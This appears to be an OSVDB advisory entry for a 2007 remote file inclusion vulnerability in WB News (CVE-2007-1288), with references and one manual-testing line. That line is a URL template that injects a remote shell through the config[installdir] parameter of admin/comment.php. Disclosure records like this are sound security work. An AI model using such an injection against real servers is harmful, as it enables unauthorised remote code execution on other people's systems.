WB News admin/comment.php config[installdir] Variable Remote File Inclusion

2007-03-01T02:11:00
ID OSVDB:34954
Type osvdb
Reporter OSVDB
Modified 2007-03-01T02:11:00

Description

Manual Testing Notes

http://[target]/[WBNewSPaTh]/admin/comment.php?config[installdir]=[Shell]

References:

Vendor URL: http://www.webmobo.com/wbnews/download.html Related OSVDB ID: 34953 Related OSVDB ID: 34951 Related OSVDB ID: 34952 Mail List Post: http://seclists.org/bugtraq/2007/Mar/0011.html ISS X-Force ID: 32774 CVE-2007-1288